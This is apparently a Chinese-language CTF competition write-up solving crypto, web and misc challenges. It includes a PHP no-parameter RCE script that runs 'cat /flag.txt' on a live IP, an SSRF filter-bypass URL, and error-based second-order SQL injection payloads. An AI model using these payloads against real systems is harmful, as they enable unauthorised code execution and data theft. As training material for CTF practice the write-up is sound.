簽到題 EasyRSA

給了flag.en和rsa_private_key.pem私鑰，直接用openssl解密，得到flag{We1c0meCtf3r_elab}

Web1 rce_nopar

php的無參數rce，利用PHPSESSID，參考：https://xz.aliyun.com/t/6316#toc-8

腳本如下：

import requests
import binascii

payload = "system('cat /flag.txt');"
payload = str(binascii.b2a_hex(payload.encode('utf-8'))).strip("b").strip("'")
cookies={
    "PHPSESSID": payload
}

r = requests.post('http://124.193.74.212:7905?var=eval(hex2bin(session_id(session_start())));', cookies=cookies)
print(r.content.decode("utf-8", "ignore"))

Web2 SSRF

把index.php兩次base64編碼傳入，可以返回源碼的base64，裏面有提示：hal0flagi5here.php

然後同樣的方式讀取該文件源碼如下：

<?php
$argv[1]=$_GET['url'];
if(filter_var($argv[1],FILTER_VALIDATE_URL))
{
	$r = parse_url($argv[1]);
	print_r($r);
	if(preg_match('/happyctf\.com$/',$r['host']))
	{
		$url=file_get_contents($argv[1]);
		echo($url);
	}else
	{
		echo("error");
	}

}else
{
	echo "403 Forbidden";
}
?>

然後參考前一段時間“高校戰役”的一道SSRF題目，使用如下payload繞過：

url=compress.zlib://file:@happyctf.com/../../../flag.txt

Web3 SQLI

幾乎RCTF2015 easysql的原題，就改了個flag的位置，修改密碼的地方存在二次注入，利用報錯可以拿到數據。

註冊如下用戶名:

Lethe"||updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e),1)#

登陸後修改密碼造成二次注入：

然後同樣的步驟得到列名：

Lethe"||updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),0x7e),1)#

得到flag：

Lethe"||updatexml(1,concat(0x7e,(select(group_concat(flag))from(flag)),0x7e),1)#

Web4 XXE

利用docx文件進行xxe，並且給了源碼:

<?php
if(isset($_POST["submit"])) {
    $target_file = getcwd()."/upload/".md5($_FILES["file"]["tmp_name"]);
    if (move_uploaded_file($_FILES["file"]["tmp_name"], $target_file)) {
        try {
            $result = @file_get_contents("zip://".$target_file."#docProps/core.xml");
            $xml = new SimpleXMLElement($result, LIBXML_NOENT);
            $xml->registerXPathNamespace("dc", "http://purl.org/dc/elements/1.1/");
            foreach($xml->xpath('//dc:title') as $title){
                echo "Title '".$title . "' has been added.<br/>";
            }
        } catch (Exception $e){
            echo $e;
            echo "上傳文件不是一個docx文檔.";
        }
    } else {
        echo "上傳失敗.";
    }
}

可以看到是從docProps目錄下的core.xml讀取xml，所以把docx文件解壓後在core.xml裏構造payload：

然後在壓縮回docx文件：

上傳該docx文件即可得到flag：

Crypto2 RSABackDoor

參考：https://blog.csdn.net/qq_29457453/article/details/104918136

腳本如下：

import libnum
import gmpy2

def gcd(a, b):
    while b:
        a, b = b, a % b
    return a


def mapx(x):
    x = (pow(x, n-1, n)+3) % n
    return x

n = 33774167600199691072470424898842928168570559940362770786060699320989546851695106466924163816843729828399984649770900793014896037884774039660562546937090412844276185560384964983508291174867808082182386566813393157054259464108858158903739578119760394228341564696225513954400995543629624209942565369972555679980359992955514826589781286738100616149226885302403505062415492679633217275379153421830105021673417544608398249866398042786421630495968810854036782025120509999022773806069591080190166920079688217334968528641747739241234353918892029263544388161160427668518991666960251381106788899451912317001247537576428186291689

x1 = x2 = 1

while True:
    x1 = mapx(x1)
    x2 = mapx(mapx(x2))
    p = gcd(x1-x2, n)
    if (p != 1):
        break

q = n // p
e = 65537
c = 0xcd979917f492a04b86057a070923bd0b9eae2f1b81c75bf5d8a8fba9fc2084c00f2a697b409578abebdabcf337382d09145630f4040b0c5ff411171e577f563c3cfb4e22639e0755f76be976f7d7e68f05f87f78f178079354b4cec2a5cbea443439420be0b850d1fb696c5dea420594ad957ba96216cdb9d8f1f316adac64bc6eac5150b02540e5232d68bb69dc04363e2115d9120af2fd1c9ff2cd7588880333608110d687b22170540861a6e2308714d54cdee5cd5d28a16e37732e44c2208251513196a63d17bd4f7a69c526c118eebfbb77cf25e5e419fef6c59c0a17132b538d945dab3553751278ef415559f2d5afc30146d277555545c4d192c5e1b4
phi = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi)
m = pow(c, d, n)
print(libnum.n2s(m))

運行得到flag：

Misc3 Keyboard

先執行下面命令：

tshark -r u.pcapng -T fields -e usb.capdata > usbdata.txt

網上找到下面腳本：

#!/usr/bin/env python
# -*- coding:utf-8 -*-

normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
output = []
keys = open('usbdata.txt')
for line in keys:
    try:
        if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":
             continue
        if line[6:8] in normalKeys.keys():
            output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']
        else:
            output += ['[unknown]']
    except:
        pass
keys.close()

flag=0
print("".join(output))
for i in range(len(output)):
    try:
        a=output.index('<DEL>')
        del output[a]
        del output[a-1]
    except:
        pass
for i in range(len(output)):
    try:
        if output[i]=="<CAP>":
            flag+=1
            output.pop(i)
            if flag==2:
                flag=0
        if flag!=0:
            output[i]=output[i].upper()
    except:
        pass
print ('output :' + "".join(output))

得到：

在vim中敲入對應的按鍵得到：

可能哪裏敲錯了(應該是honk和Of)，得到壓縮包的密碼爲：honkover1esOfNanle

解壓得到flag：

易霖博CTF——Writeup

簽到題 EasyRSA

Web1 rce_nopar

Web2 SSRF

Web3 SQLI

Web4 XXE

Crypto2 RSABackDoor

Misc3 Keyboard

《機器學習實戰》讀書筆記——k-近鄰算法

算法實驗考試複習

領航杯部分Writeup

淺談python反序列化漏洞

學一下shell編程

https://yachay.unat.edu.pe/blog/index.php?comment_area=format_blog&comment_component=blog&comment_co

linux以太網驅動總結